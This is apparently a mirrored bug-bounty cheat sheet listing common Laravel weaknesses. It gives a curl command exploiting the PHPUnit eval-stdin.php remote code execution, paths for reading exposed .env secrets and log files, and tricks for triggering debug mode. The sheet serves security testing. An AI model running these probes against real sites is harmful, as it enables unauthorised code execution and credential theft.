mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
1005 B
1005 B
Common bug in laravel framework
- Laravel PHPUnit Remote Code Execution
- Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
- Affected versions : Before 4.8.28 and 5.x before 5.6.3
Command
curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
- Exposed environment variables
- Full Path Exploit : http://target.com/.env
- Exposed log files
- Full Path Exploit : http://target.com/storage/logs/laravel.log
- Laravel Debug Mode Enabled
- Using SQL injection query in GET or POST method
- Try path /logout (ex:target.com/logout)
- Using [] in paramater (ex:target.com/param[]=0)
Source: Nakanosec